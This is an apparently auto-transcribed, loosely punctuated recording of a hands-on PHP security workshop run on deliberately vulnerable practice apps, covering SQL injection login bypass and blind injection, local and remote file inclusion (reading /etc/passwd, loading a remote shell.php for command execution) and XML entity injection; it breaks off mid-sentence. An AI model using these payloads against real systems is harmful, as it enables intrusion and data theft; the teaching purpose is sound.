 PHP has been something that I started with, it's a romance that I had with PHP because it's one of the first languages which has every security issue that you could really think of. I've been pen testing for around close to 12 years now and am I audible at the last two? I can't shout more, I probably need a mic. So I've done my introduction, I'm going to repeat it again, generally a quick idea is that I've been pen testing and I've been doing pen testing, pen testing is basically break security applications. Our job comes in, we're trying to redefine ourselves in the agile world these days but predominantly it has been applications get built, I call, I'm inside, find faults and the developers go fix them and I basically recheck, that's how my job has been but that's been changing a lot within the agile, we're trying to doing a few things differently these days but that's for another talk for a later date. My slide share, my PowerPoint is not, one of the things I did yesterday night was upgrade my Mac, bad idea, a lot of things are not working on my Mac right now which also includes PowerPoint, my databases are screwed but as it's a workshop so it becomes easier for me because you're going to do the job and I just have to walk around. Some things that are important for pen testing, why does a developer need to understand security? One for the matter that you try and sometimes security issues can be very costly, sometimes it meets the fact that you might have to redesign your whole applications a certain way and that could be a very costly episode and one of the reasons why you should be doing it is understand what we are really looking at and security guys are also someone who understands code and who breaks according to the code is. So it is something that you could do ahead of time, that's what it is basically that's why we do these sessions. The most important content that I'll be sharing can be dangerous, please don't hack applications across in the real world, if you do you're responsible for it, not me. So the way I have done it, I have learnt it is I have given you a set of applications that are publicly available like something's like multi-day, DVWA, these are available, so these are there for you to play around, there are multiple such things, I'll try and share as much as possible with you but also is we write our own applications if you've put in some, my code, there are some specific ones which are a little advanced not necessarily that are there in DVWA or some things where I find is a little wanting, we write our own or we ask the developer to write it a certain way and then we break into it and see what it happens. So I've given you both of it, so one thing that as a security we write is I sometimes write and my colleague breaks, my colleague writes I break, that's how we work around it. So I have no content around it, please work with these instead of exploiting something on the world, it's too dangerous. I'll try as much less theory as possible but quick hands, how many of you know what security is, have some brush around it, how? Keep people going out. That's not actually the case, that's what people think it is, I'm a normal guy, you don't keep people out. Okay, I have a few show of hands but let me, so for want I'll try and cover a little bit towards basics and a little towards advanced so that we get a little bit of mix, you know, we do everything around. Some of the things that I picked up today, so PHP, I have a two hours slot, generally if you go through the slides it's a huge set, we do it over a period of two days. I was told I have two hours of time, so I tried bringing out some of the most unique things to PHP. What are the unique security issues that are there for PHP and I'm trying to bring them out here. There are others, so it should be a constant quest. I'm sure, yes, bigger, better? Thank you. I'm sorry, I'm not able to make it a slide show, the power point is crashing so we'll have to do with this. How many of you heard SQL injection, whole class? Someone wants to explain. I'll make it a little easier, let's say there is an application, pretty much you've seen something like this, I use a name password and do you think this can be SQL injected? Like how? If you drew a drop table, sure, is it really going to be useful to you and what are the repercussions of doing a drop table? You don't want your administrator knowing that the site is down, sure it can be done, but is that what you would do? Sure, what if it's more easier? What's the first thing that you would want to do? First step is to bypass the login itself, which is possible, you know, for me generally it starts with SQL injection because that's the first hack I ever did, there was a site called Sonsil Gang of Girls, it was an Indian based site and pretty young, not married before, wanted to know what women think and that was the site we hacked and thankfully the site is no more, I think it's not working, I'll try without, if I'm not audible just shout out and I'll try and come a little ahead and talk. So the thrill of going into a website with, you don't have any authentication itself is truly exhaust, amazing, okay, so let's try this, if this is in place, I'm sure most of you understand SQL here, right, most of you are developers, let's say this is the query that is there, how would you bypass this, sorry, how would you insert into this, this is a select statement, let's say we want to just bypass a login, what would you really do, huh, yes, yes, so the thing that is, you do something like this, how many of you have heard about this, this is very common, if you read anything about SQL injection everyone talks about this, let's take a minute to understand this because hacking is also about understanding what the systems are underlying doing, it's actually a very simple thing, it's actually, there's a typo there, if you notice in the user I have entered single code in the explanation I have entered double code, actually it's wrong but you should match the exact ones, so let's say I assume that there is a double code there, so the first double code that the user enters, so we are assuming here that the user is entering it in the username, so the first double code closes the double code that the application has put or condition 1 is equal to 1 and you basically put a hyphen hyphen to basically comment out the rest of the query itself, question to people is how many, let's say this login table or in this case the user's table has 100 records, how many records will come back as a response of this, why, huh, yes because the 1 is 1 equal to 1 is true for all the records and it's an R condition here so it's basically going to check at every record and it will be true for all the records and that is why you will get all the 100 records back but technically you cannot login with all the 100 records, how does the system work, it's a record set they would probably have said that give me a record set of 1 and you take the first record and that is why technically you become an administrator because when someone writes an application they generally enter the administrator record first, so there is no real guarantee that you become an administrator but works but if you read through the documentation it doesn't generally come out so well, okay, so first steps is if you've gone through my setup.txt I would want you to test this out, I want you to bypass a login and check, if you go to my link and go to setup.txt, so something there is a website, it's run by a company called AcunaTex, find this website and bypass a login, everyone has been able to install Zandt and all the other files that have been given, just keep doing that as we talk because we might need all of them, do we need to keep moving this all the time, do we need to keep moving this all the time, any luck, someone's done already, imagine this is your real application, you get paid to do this, anyone done already, yes, so you don't have any credentials at the moment, you've got a login, go on, the tough thing here is to walk around, to walk around, see what's happening, it's done, so you've been, you're on this website, right, now you don't have credentials, I want you to log into this application as simple as that, so you'll have to find out where is the login page first and then try logging into the application, sorry, so that's a good one, there is a test user there, please don't use it, we have to learn SQL injection, so try doing it with SQL injection, so it's not, don't use test, so that test is basically to, there is another school of thought that it is a brute-forceable user ID there, it's a different kind of an attack, so this application has multiple such security issues within this itself, so there are lots of issues, you know this is not the only security issue that is there in this application, it has a lots of security, one of them being the guessable username password also, did you log in, why? No, you're complicating it way too much. Your spaces are wrong, did you finish? It's in the setup.txt, open setup.txt and you should be able to see it, it's done, I'm not going to tell you that, could be anything, but you could generally take guesses, if it's a PHP based application, it will generally use my SQL, but that's actually a good question, that brings out a very good point that she brought out was, what first things that you think of a SQL injection is, you have to understand what is the background database that could be, sometimes we will not know the answer directly, so you have to take assumed guesses and a general idea of fact is, if it's an MS SQL or an ASP based application, MS SQL server, if it's a MySQL, mostly it's a PHP based application, it's generally the idea that is, the reason for that is, there are subtleties in how SQL works, so you need to follow the right SQL syntax for the database, I've been noticing that a few people are doing mistakes with spacing, you'll have to be careful about how you put spaces and how many of you knew what I was doing when I put those hyphens, what does that mean, correct, so let me give you a clue here, this is a MySQL database, the MySQL database, the comment is hyphen hyphen space, it has to have a space after the comma, if you don't, MySQL will not work, yes, so the way I work with it is, I always put hyphen hyphen space hyphen, so that I visually know that there is a space in there, with that is anybody able to finish it, you're done, awesome, how about you, no idea, let's go, let's say, go on, let's see what happens, no, no, no, we're not doing that, so this is going to be, so first things you have to assume is, a username is going to be a string, so we don't know the user, no, let's not do that, so let's say a single quote, then we say, so this single quote will close the quote that the user has opened there, okay, you say, or, space, 1 equal to 1, hyphen hyphen space hyphen, close it, we've already closed it, see this, we've already closed it, so we don't want to close it, because we don't bother about what is there behind, oh I see, so this part username is closing the actual, yes, and there's one trailing, so we remove this, you're administrator, I'm very like, I just query the, like that, that's now, yeah, I need to go in this specific part, you think, oh no, wow, I don't know, stick to the login, but where are you able to do the login, oh it's going into the, yes, so you've not logged in yet, so type it out, let's see what you're typing, see, first things first, there has to be a space, okay, so single quote, so you have to understand what the single quote is doing, so the first, so when they're writing the query, the user, they would have started with the single quote, right, so you need to quote out that query, you need to close, it has to make valid SQL statements, so you take the first one and you close it with the second one, so you basically, this single quote will close the single quote, then space or, so you, no, so you just do single quote, space or, what is that, or 1 is equal to 1, what is this in between, that's wrong, go here, so, sorry, so remove that space, put hyphen hyphen, space hyphen, login, your administrator, okay, for people who have not done it, let me show it to you, so think of it like this, so are you able to see my screen, so you start with a single quote, the reason being is, you want to comment out the entry that the user has put, then you put or 1 equal to 1 hyphen hyphen, space hyphen, and you login, that's it, now I'll throw a challenge to you people, okay, the challenge is, you know that there is a user called test, right, use the test, but don't use the password test, login as user test, there is a user test within the application, so if you look at this, where is log out, okay, now, so you have test, right, but you don't know, let's say we assume we don't know the password of test, but you have to login as test, how would you do it, it's all sequel, think about it, it's in the same lines of what we spoke about, you have to login as test user now, and I'd like to see your query string what you will enter, don't use the same, there is a different one that you can do, okay then show me, it's the same type, it's just that you don't know, see in this case what it is basically saying is, I don't know what user name you have, you match all conditions and it's giving you back this, I want in this at test itself, like what, sorry, sure because the sequel injection exists in the password also, I want it in the test, so in the user name you only should have test, let's say you don't know the password, yes that's a good one, just to clarify how I want it is, you know that only your user name is injectable, the word test should appear on the user name, does it make sense, it's actually more simpler than what we did, think about it, what did we do, just to get your quick attention, what did we do, when we do this what are we really doing, let's go back to the presentation, what are we really doing here, see if you notice what we are really doing here is, this is what the developer has written, right, user input will come inside between these brackets and this between these brackets, correct, we put a single quote and we closed this one and we did this whole thing, so what it effectively did is all the records comes, the first record is picked up and then given to you, now we know that there is a user test, imagine in a real world scenario there could be an administrator and the user name could have a SQL injection in it, how will you log in as admin, it's actually more simpler than what we did, you've been able to do it, correct, that's the exact right way I think it is, but it could be done more elegantly, let me just show you, let's log this now I'm saying it's perfect, I actually like what you said, it's just not logging out, so the whole idea is you're logging in as test user on here, you don't have to bother about the rest, you just have to comment off everything, that's simple as that, so that's enough, that's it, why you've already closed it here, right, you don't need to close it and if it's commented out everything behind is, don't care, so you don't have to bother about it, right, that should do the job, that's the more elegant way of doing it, hello guys, you've been able to do it, sure, did you do the first one, did it work for you, did the second one work for you, perfect, think through it, see now there is a user called test in the database and we know it is guaranteed that test exists, so basically think from the query, what does it really say, select star, so when you're programming something, you're going to say if a record set object is coming back with some response, it is a valid user, if that is the case, how do you go about doing it, so all you have to do is select star from only test and rest all, I don't care, that's your answer, did you do it, just the test, no, yes, you just have to log in as test, but you don't know the password, no you cannot enter it there, there's nothing to be entered in the password, but you have to log in as test, yes, the test user name, correct, yes, you have to write, did you give a space here, yes, I will do it, but did you understand why it's happening, yes, so you put it after test because there is a single code there and after that your test should close the user name and rest of it is gone, try it on, I'll show it if a few minutes, did it work, I think you should have done it, right, so I want you to log in as test, not using any or is equal to one, is equal to one or anything like that, so basically saying that you have to log in as test, can I see your, I use the same approach, no, that's not the right approach, you want another approach, yes, which is using my, think, think using what query, so let's say you have a user test in there, you can log into the Wi-Fi, I can't allow me, Michael already did, okay, can you help me for the computer, IDA at great labs, did it log in, yeah, as test, yeah, switch it around, what do you mean by that, can I see, so here, I just had test, okay, and then I just did the, no, no, you are not putting anything in password, cannot, I'll come in a second, yes, no, you cannot enter anything in the password, just blank password, just to remove your confusions, it is a blank password, you cannot enter any password, no, you cannot, why do you have to, it doesn't have to be, there are other ways to, see, it's all about learning how SQL works, in this application it will, in a real world it won't, that's why, yes, it has to be blank, and then you still have to become a test, it's all SQL, it's all, how you play around with SQL, can I, perfect, I see a few people who have already completed it, can we give a minute, or should I show you how to do this, you just didn't do what I wanted, see, the reason being I did, I want you to do to this, is to understand how it, see, every document that you read, always talks about only r is equal to 1 is equal to 1, a developer could write a regular expression on his back end and say, remove r is equal to 1, if I see anything on that, I will not let you log in, that's how blacklists work, right, so you, that does not mean SQL injection is not there, so you need to know different ways of doing things, one of the ways I wanted you to challenge was to log in as test, without putting anything in the password, but we log in, I think a few people did, do you want to show them how to do it, good, you can come to my machine and do it, you got it, won't work, because you didn't give a space, that's it, didn't make sense to you why it happened, the single code after the test closes the user name, and then we put a comment entry to close off the whole query after that, so we don't care about the password condition at all, as simple as that, so you, you starting to understand how it really works behind the wheel, when you write database queries, yes, so in real world today, it becomes more a little more difficult, nobody writes direct SQL anymore, we use ORMs, there, how ORMs work is they internally use the SQL, but they use parameterized queries, how many of you heard what is a parameterized query, one, two, three, okay, let's continue with the presentation, I wanted to show you a few more things, let's come back to this a little bit later, so what do you understand, so from what we did, what did you, what was some of the main things you thought was the problem of SQL injection, short was one way, what it really means is you can dynamically modify the query itself, that's the problem, parameterized query takes that away, it does not allow you to modify the query, and that's the secret of a parameterized query, every application logic today supports parameterized queries, you should be look, if you have to write, so though we use a lot of, the reason why we need to know this is, I work for an organization where we use a lot of ORM, but there are scenarios where we have to write dynamic queries, there are scenarios where we have to do multiple joins across, so many things that ORMs cannot handle it, and we have to write a query at that point of time, we take extreme care, if to basically whether we are creating a SQL injection kind of an environment, how do we check all those things, we check what user input is going into the query itself, will it be able to manipulate it, only if we are very sure about it, we let it pass into those queries, though the number of such queries are very very less, most of the time ORM should be able to satisfy the job that we really want, but there are scenarios where, if you look at ORM itself has some functionality where you can allow generic SQL, if that is the case you have to be extremely careful, and it helps to understand these things, now let me talk a little bit about MySQL specific thing, how many of you knew within MySQL there was something called magic codes, what is magic codes, I cannot really hear you, it adds slashes, so when we put that single code right, it prevents it with a slash and it basically breaks the query, this is a security feature, the older versions of MySQL used to include by default, but this was discontinued, MySQL decided to pull it out of this, because of a problem that people started doing, people started believing that because magic codes exist, we can write bad queries, we can do anything and it will never break, security is never driven that way, the problem that people started was they were like, oh it's comfortable, it will just take care of it, we do not have to bother about it, the result of that was the magic codes could be bypassed, if you could send your payloads in hex, it would bypass it, the magic codes would not be able to detect it, and that's the reason why they said, okay, you should, as developers you should be writing good code, don't depend on the frameworks, and ORMs are no ORMs, I think it's something that you have to continuously keep looking, whether we are writing good code there, so this was some of the basic SQL injections, now I was actually going to be talking a little bit about something like this, are we doing good on time? Okay, I will just give you a quick brush through and move to the other ones because I still want to cover up some sets around things, sometimes you may not get errors, here we were getting, one quick thing is someone can actually try, put a single code and just press enter and see how the system responds, within your application here, just put a single code and put press enter, see what does the system do, unfortunately it's not, but generally applications give out an error, when you put a single code and you don't terminate, MySQL creates an error saying that null terminated string, so basically saying there is one extra single code, I have two but it's become three now and it's not closed, so it basically says a null terminated string is there or some kind of an error is there, which basically says you control the MySQL environment, this is called an error based SQL injection, sometimes errors will not come back, there will not be something that will tell you that there is a database in the background, how do you deal with that then, sorry? Sure, that's the way it is, but there's a concept called the blind SQL injection, what it means is you manipulate your queries in such a way that you will be able to understand that you can control this query, let me actually show you a demo instead of you doing this, let me show you a demo, are you able to see the URL here, this is the URL that is there, okay, now let's say there is no error that is coming back and I have to do a blind SQL injection, something that I will be doing is, see it's the same values, but I will just copy this, now the next one that I entered was this, do you see a difference, yes, correct, but how is this helpful in this context, I am sure everyone knows it's a one and a two, it's actually very simple, so think of the behavior changes that happened, you saw a behavior change, the first one it showed some data, the second one there was no data, that itself should tell you something, that means I can control the query and also please notice art is equal to one is the default one, that is what the youth developer had thought, but we are now adding content into it, what did we add, percentile 20 which basically means space and we've put an and condition there and said and one is equal to one, which basically means art is equal to one and one is equal to one, is one is equal to one, yes, when you put an and condition both have to be true, correct, that's how logic is right, it's an and operator, so it effectively means both have to be true, in the second one one is equal to two is not true, so it becomes false, true and false is always false, that's the behavior that we are really looking at, that make sense to you, so sometimes even if you don't have errors we can use things like this, injectable, now you can continue to work on this because we'll have to save some time, do the others also, we will cut this out, one thing I'll tell you is there is a tool called SQL map, how many of you have heard of this, it's a Swiss knife for SQL injections, you may just want to download this, in this specific URL all you have to do is SQL map is a python based application, so it's SQL map dot pi hyphen you and give the URL, it will do the attacking for you, don't have to bother, but learn the fundamentals, it's very useful to learn the fundamentals before you start using the tools, largely, see because there will be scenarios where the tools will not be able to find out problems, we've not covered things like second order SQL injections, those are not something that SQL map really works well, but it's a little advanced for the specific session we are, maybe once you build up a little bit context we can come back and do those things, just to add a little bit and one is equal to one and two is not necessarily the only way, sometimes you can ask the database to sleep for a few minutes, so let's say you take a request and the request takes 20 microseconds and you sleep for 100 microseconds, your total response time becomes 120 seconds, you know you control that environment, you can totally take over the database, okay, let me, how many, all of you have installed the exam, show fans if everyone is installed the exam, you're done or you, the exam, okay, so let me quickly show you, once you install the exam, I have a Mac, Windows users, I don't know how, shouldn't be much different, I'll come and see yours if it's coming to it, won't work, maybe you'll have to pair with someone, so we're now going to use an attack, a tool called dvwa, we're now going to look at one of the very famous php attacks called file inclusions, how many have heard what is a file inclusion attack, okay, I keep getting one hand up, see one of the most, if you typically looked at a php-based application and if it was at least 10 years or old, you can be guaranteed that there is a file inclusion attack, because that was the norm, that was the design pattern they used, so you would definitely see it, but what it effectively means is, when a script loads a file, a file could be from a local host, sorry a local machine itself and it is using that to display some content and if you can control that file or what it is going to load, you have a file inclusion attack, to do this you need to install dvwa, the way you do it is very simple, once you installed exam, if you have downloaded the dvwa, it is like a zip file, unzip that file and place it into your htdocs folder, if we do this for today that should be enough, because that creates a hacking platform for you to play around, dvwa has multiple security issues, I'm just looking at one of it today, because we'll keep moving one after the other, very good question, now if you download this please assume that if you put it on your machine, remove it before you even do any browsing or any of those things, because these are vulnerable applications and if you run a database which is as a root and you're on the internet, someone can use this to hack you, these are purpose built vulnerable applications, please do take care of them, it's not just exploitation, these are exploitable, that's a good question, so please do care, use them but so the way I work is I always know that I will shut down my servers, I know my servers are there, I will shut it down, period and use your firewalls basically and use it with care, are you doing it or you don't want to do it, sure, go ahead because I am SSH key and maybe put a vm and use a vm to do it I have the, it's all the htdocs already right so I can actually put it there yeah but you can create a vm, install the exam inside the vm right it's a separate environment, my content is all separated on a virtual box so you can do it something like use your docker or use your vm to do the job or pair with someone, problem is I may not be able to show some of it because my database is not working so you'll have to pair up with someone who's doing it is it possible that this kind of app is actually stealing your SSH key no it's not see your app per se is not hacking you the app is not hacking you but let's say someone knows your url like my web servers have been tuned to that it'll work only on 127 nobody from outside can access those pages so if you do all those things yes but the app per se is not going to hack your machine you got the point but if you have these apps and you're on live someone else can hack using these apps on your machine that's what it is if your SSH keys are there it doesn't make a difference your app is not going to hack them excuse me did it answer your question so you can actually create a vm install it on a vm destroy the vm as you go stuff like that how will you learn otherwise see you have to be paranoid but does not mean you don't do it security is about being paranoid about what you do but you have to do the things so the way you do it is you create vm skips seclusions and you still learn what you have to learn have you been able to set it up have you been able to set it up dvwa running how long do i have to for another another hour okay maybe an hour and 15 minutes i'll use up yeah i have enough because this should need some uh it's already three right so four i'll should try and see because the other person will need some time at least right so okay now we gotta rush locals dvwa right huh the folder is dvwa so slash dvwa local hosts you put in yeah dvwa uh okay okay okay okay okay okay no there's a there's no i okay all right what uh okay change the name to uh quick question let's say you're browsing to a web application how will you know that the web server is a linux based line of a server or a windows based web server sorry let's say all the headers are removed someone is cleaning it up very well what could be some of the things that could be very subtle things which are very useful i saw him so i'm i just got the thought in my mind no do you know the behavior between cases between windows and linux upper case lower case a windows will support both the cases linux will not support it so you take a file and put it in all caps if it works and you try it in lower case if it doesn't work it's a linux machine if it works for both scenarios it's a windows machine the reason is why you did that is when i thought about it uh so you'll have to set up the server so hey why is it not able to connect okay so what you need to do is yeah so can you just go to the dvw then where's the dv config it's not complete yes inside config open this is this the password i think by default is empty like this is your database running it is running you don't need this okay so do you know what password you set for this i think it just download by default so what is the default can you just google for find out of a this is the exam for mmap this is the exam right so just say exam what is the default password sorry what is the password so then you need to put the password as root and then just check hold on that's okay that shouldn't be the problem it's not connecting so we need to everyone else has the same issue let me just check have you been able to set it up the exam okay anyone else done this till now has everybody has anyone been able to set up dvwa not able to you have a similar problem as me so what it is telling you is do you know what is the password for your mysql environment it's telling you that the password is wrong can you just google and find out what is the default password and then it says it's blank just put space yeah right but doesn't connect but is the dv correct or not the name database name correct uh is this the database no the first one is the database it's going to create that's okay okay okay so that should not be the problem it's not connecting to the database that's where it is there is a it is Apache because is will not support php right okay you can download exam for windows did it log in for you what is the problem you're having just i put password without the ad symbol yeah please work please work can you just give me this let's restart the i'll just be back let's look around and come back once did it work for you now because my mem is still there maybe it's okay you said you have ma'am right you're not going to use exam which is fine which is not a problem it's okay to remove the pages as you've deleted you have to be careful otherwise it's not going to work so you're starting to look at sequel map oh you got it you're running yes i don't know what to do here admin password just put admin password how did you get what is the password default password can i see your db config yes one login so i can you just give me the files i want to where did you install dvwa is this dvwa i'll log in to go into it go inside it there is a db config right see if there is a db config there is a config folder cd config cat config password is blank no uh very for the miss my cpo i changed it i i didn't use the xamn cd that's why i really had a apache in a you had okay so i can't use your logic okay but you seem to get it so let's wait for a few minutes so that i know if can you work for you so once you have the db dvwa so and you're logged in as admin uh yes you log in as admin password okay by default it's admin password yeah you've logged in yes but um what do you do after i'll come to it i'm hoping others also can do it uh you've been what's the problem see what's the did you install exam it's not example i have already php my specifically installed on engine access base so i just uh set up everything then is this the password correct for the database no uh go down go down set up create reset database click that go down yes it are done now we'll click login go down see there login admin password i'm sure you can help the others here have you been able to set it up admin password uh did it work for you guys put up the show what do you need to install okay just leave this you want to install the dmg right just double click and it's not maybe it's something stopping yeah it's not working so maybe redownload it it's not properly yeah i redown it this is just now yeah earlier yeah why is this working uh can you get up i'll take your machine did it work for you okay that's okay you can use any web server any any environment fine shouldn't be a problem which one better not it's just installing a database with files you can clean it up after that you can give my name shouldn't be it's a known risk i'll tell you what we're doing so we're pushing a set of php files and we're pushing a set of sequel files and we're installing the sequel files that's it you're not doing anything more than that okay so once you're done just delete the dvw folder from your uh that's it why are we running this huh this is going to set up the database in the background for us to play around yes i thought we were trying to uh i think we'll do it after this okay so how you click that click that button go down it's not connecting to your database why is there any controls that are placed on you to install anything uh can you install any other applications can you install all applications i'm saying basically you should be able to install any application you're not able to i'm not able to figure out why it is will it work for you correct correct correct go to just go to local host dvwa the one that you posted right out there right did you paste it as dv change your folder name so it's easy oh yeah the side i have another copy did it work for you uh don't bother about it don't need to have it just setting the database it's not connecting to your database check if your database is right and then go to see once inside your dvwa folder go inside like this go inside config there's a include file there check if your password is correct change your password and save the new password and just create it go down you're done say login admin password why is it not coming did you shut down your database sorry you shut down your apache server and just refresh it should work for you maybe you can just pair with her if this is not working you can just join with her any any of you all got it working sorry the login oh what's the login admin password did you be able to set up not yet maybe you should pair up with someone admin password okay i think most of you have been able to get it so let's continue did it work for you guys let me show you it's easier that way uh was did you be able to set it up why okay we'll troubleshoot it give me a second we choose that we just save time okay once you log into your uh can i have your attention so i know some of you have been able to set it up use this you have it with you you can set up whenever you want it but what i want to do is something called file inclusion okay we come to this page click this page look at the url the url is something like this what does it tell you that's the url in the behind i've just copy pasted the url so that you can easily see it what is it telling you uh people you have done it exploit it show me what you can do with it what do you guys think anyone okay go on you have to attack this so how will you attack this think about it correct sure it's actually correct so what if what kind of a file would you then write but let's say this is a local file inclusion so there are five she got a very good answer she told me uh let's i will not give you the answer yet because i want you to think through it there are two kinds of inclusions one is called a local file inclusion and one is called a remote file inclusion and then what would you do it think about it i'm not going to do remote because it'll exploit my machine but i'll show you something interesting um but you're thinking the right way did anyone of you get what can be done if this is the kind of url you see how can you exploit this where can you upload a php file here to anywhere yes how will you attach the file here you have you're going the right way but where will you attach where will you attach the php file sorry there's no form all you have to do is that url all you have to do is that url huh no all your exploitation can be done in that url itself i didn't get you like what what are you thinking because file one is now a file that's on the web server correct i'm trying to point it to a different file somewhere else yes and get the server to run that exactly how will you do it you exactly right putting the url into page equal putting the url of a different file in the name of file here all you have to do it's perfectly correct instead of file one dot php give a url path and it'll exploit it'll take a remote file include in itself and hack the server did you guys get it okay i'll give you an example what i want to see i am a mac user so i'm going to be from very mac biased i want to see your etc password you know mac machines have slash etc slash password so instead of using a file name can you just say slash etc slash password will it then show the server's etc password right as simple as that it's a remote so it's basically there are two like i said there are two kinds of inclusion attacks that are there one is the local file inclusion and one is called a remote file inclusion depending on whether you can read remote if it's a remote it's actually more dangerous can someone answer is why it's dangerous sure what kind of dangerous phase what kind if you really think about it what would be the most dangerous file that so i don't know if people have got it let me show you this how it'll work instead of this put slash etc slash i'm going to leave that for long for you guys to see what all packages i have installed huh sure but did you get it did you if you do this you should be able to see your password file but in a windows machine from windows users you should be able to see your boot dot ini but this knowledge of mine is pretty old i don't know where that boot dot ini of a windows machine is anymore or it can be technically any file on your file system so you can actually say but i'm seeing most of you are mac users so except you did it work for you or not uh did it work for you did you be able to start it yes why did your database problem solve and did you log into the system why can i see it's saying it's not able to connect to the database uh can i replace the simple connection string or it has to be this it has to be there this one because we don't want to modify their code we will become difficult let's see sorry um is it working for you okay say click file inclusion uh okay click this let's try if it doesn't work then i'll set it up for you uh change this just remove file one dot php slash full full remove the whole thing slash etc slash password enter file not found okay we'll have to fix the php dot ini for you uh what it is doing is there is a control where it's not allowing you to read we'll i'll come to your machine and i'll fix it for you didn't work for you why uh i skipped my existing website okay so you've not started it you've not installed it fine uh when i'll come i can't hear you what i don't use teaching uh so probably what it is doing is uh the php dot ini is not allowing you file includes okay did it show you an error on that page no you already enabled it did it work for you yeah it's able to read right yeah but i try to look for uh my my so it'll be able to read my expertise on windows is a little low uh but we will i'll fix that then we'll come here and i'll come but you're able to read the files right but only within that route why why one two three you should be able to read in a mac you should be able to read the whole system uh so one two three correct but there is a four which i could not read don't bother you can actually read anything on the system remove that include dot php file not found ah okay to uh just okay one thing that you need to set is maybe it's not set for you also can i just see your machine where's your dvw a ah correct right um if you see on the left hand side there is something called a dvw a security set it to low you cannot hack it with impossible it is so basically this is also teaching you to protect if it is an impossible you can read the source code that it will never be able to hack set a low maybe that's the problem for you also and that's why you were able to read only in the directory so i'm sorry i'm sorry uh first things is open up your php.ini search for this allow url include and set it to on okay then remove this so technically you should be it did it work that was the problem so i can now slash slash or go you can slash etc it's not infected okay uh think about what kind of a thing that you will inject in such a way it's dangerous is this supposed to be correct but you need to set your uh this one to low i said and why is it not working and let's see your final inclusion see you've not turned on this one open your php.ini and change this to on the script that downloads a shell file what kind of a yes a shell file then you can rm rm everything yeah don't think danger so you shouldn't do rm rf see think of it like this when you do an rm rf it's more simpler take a get request send it through exec and you have a shell which you can exit any system commands into the system as simple as that make sense you never do an rm rf when you're a hacker you don't do it the reason being is if you delete it the administrator will know you don't want administrators to know huh and uh now we are at this one okay uh admin password did you get it okay oh i'm so sorry yes turn on that function okay hold on let me first things first change your security level to low then go to your file inclusion change this let's see if it works if it doesn't then we'll go change it touch your password file yes how many of you know how passwords are stored in linux is it enough to just see the slash etc password folder yes passwords are broken up into two files in linux one is the etc password and the shadow i'm not going to show you my shadow when you get the shadow you're still not going to break it you will get the hashes which you can use john the ripper to break but to see a shadow file you need to be root one thing with hacking is not necessarily that the web server so what kind of a credit so there was a very interesting thing that you said till now we are doing the slash etc password right what what you could do is write something called a shell a web shell which you can download for matter if it's free or you can get it and instead of etc password say slash http prasanna.com slash shell.php as simple as that what would happen is our program will now connect to prasanna.com take the shell file and execute it locally and what you have at that point of time is a capability to run commands on the server think to notice the server will if it is running with the lower privilege you only get a lower privilege so you might be able to read a password file but you may not be able to read the shadow make sense so that is where the next level is comes in with what we call the escalation of privileges which is maybe something you can pick up later there yes still not working maybe is that the php.ini file and what did you change the security settings to low and still not working then we need to see correct go to file inclusion click click click one of them see on the tab file 2.php remove it and say slash etc slash password remove remove see it is trying to read exist that's also wrong that's it because it is reading exact files it's reading the file and showing you the output for you it may not be etc password it should be a windows file try reading your boot.ini don't ask me where it is stored though did you get any other files outside you can read seecribe right you're able to read all the files there in your own machines you can write web shells try executing it but i leave it to your later date don't do it now you can't download there is no point of download here the behavior is you should be able to read files correct remove that and put whatever file you want to read from the file system I want to try this because it's in the same folder no don't don't put the same folder read something which is outside the so you can read even to the extent of c drive okay it can read any file on your system now no but you need to give a path you'll have to give the full path c colon it's d it's just in d okay so give the whole okay now it's secure no it's not let's go no hold on hold on can you did you set the this one to low settings dvwa settings to low okay maybe you have no no go back to your page go back to your page remove this just load dvwa what are dvwa security go down see it's impossible set it to low now try the same thing i think windows windows i see for windows users i think you cannot put a slash i think you should put double slash i think something like that is there for windows does not accept one slash you should put two slashes all that kind of so but you've got to attack right you understood what the problem is did it work for you anywhere on this table okay uh you have it running you're still not able to connect your database this is a problem uh do you want to go pair with someone and then be able to do it or let me show this oh you saw this right so maybe try resetting it at home and try figuring it out because the reason is i want to rush i have 15 minutes to do the other stuff uh just moving along a little too fast uh the next one i don't want you to guys to do it i'll show it i'll explain what is the hack because be doing it we are not going to we don't have time for it now sorry is it okay the next one is an installation i don't want them to spend too much let them do it at home uh so the other one that i wanted to talk about is a very interesting hack called xml entity injections have you heard about this attack i keep hearing the same people's names sorry okay so for this one like you install dvwa for the second one you have to install another tool called the multi-day uh please do it at your home do it in your separate environments whichever you want to do uh i'm just going to show it now so that we save time i'll give you a little bit of fundamental behind this one first let's say there is an application which accepts xml what kind of applications accept xml developers there was an older system of if i give out the name you will know access okay one sop sop soap is an xml message right so the reason i ask you is to for you to start thinking where can you hack when you're using a application like dvwa or any of these applications the weaponizing of the attacks doesn't come very quickly because you think i'm just entering something and it's something is happening you should start thinking in the real world how things will be in real world how do you get xml for an xml entity injection to happen the web server needs to consume an xml that's the prerogative start one if that is the case you have to start thinking what all scenarios do we uh get xml one of it is soap and if you can create a malphite soap or something like that you should be able to play around so let me give you an example there seems to be an example here you copy this you paste it here say validate xml what happens don't worry about xml if you if you see this kind of a behavior what is the first kind of hack that you will think of in your mind you're able to inject an xml and you're seeing some output on the web page what's the attack that you can really think of quickly what can you think of sure but why html only you can inject javascript also right yeah well that's a good one actually that's what I was looking for the most obvious thing that you should be looking for is a cross side scripting doesn't make sense uh in this case cross-site scripting will not work or it you should do a little bit more to make it work your default script alert script will not work here your homework is to figure out how it to make it work uh but now let's say we want to inject uh in such a way that I can control we did a file inclusion right you could do a similar file inclusion kind of attacks using entity injections okay let's do this now should I forgot where I put the exploit just give me a second please where did I put my what do you think is this this is an xml what would happen if this xml gets executed this is all the basis to create an xml entity injection someone said they knew what is an xml entity injection can you explain this xml anyone okay I'll explain uh if the parser is vulnerable what it will do is it when it is going to build the output it is going to do something called it will take this entity directive that is here execute it and the output of that one is going to be put here do you see it here the entity is called xsc and the address of the entity is been put here make sense so whatever is being told to be done as an entity will be executed the simple power the xml parser will execute the entity the output of it will be made a part of the xml itself if that is the logic think what you can do you can effectively do anything that you did as a remote file inclusion okay so let's execute this you see the output you can create a shell it doesn't have to be a remote file inclusion you can do anything that we did in the previous using the same attack like this you can google and find out that there are multiple applications which are vulnerable to xml entity injections it's not a theory it's possible okay now i have a challenge for you people i have a can i take some more time i have a a web pay so can i have your attention so i have a application here called one dot php which takes a username and password i was lazy enough to not write a form this is a beautiful tool which is called hack bar which allows me to write posts unfortunately this will not become bigger i'll show you what it is at least on a did xml entity injection i rushed through it did you guys understand what it is that is the url and this is the post body oh shit you have to hack this application to get the flag a flag is something that we play in so like developers write code to keep their 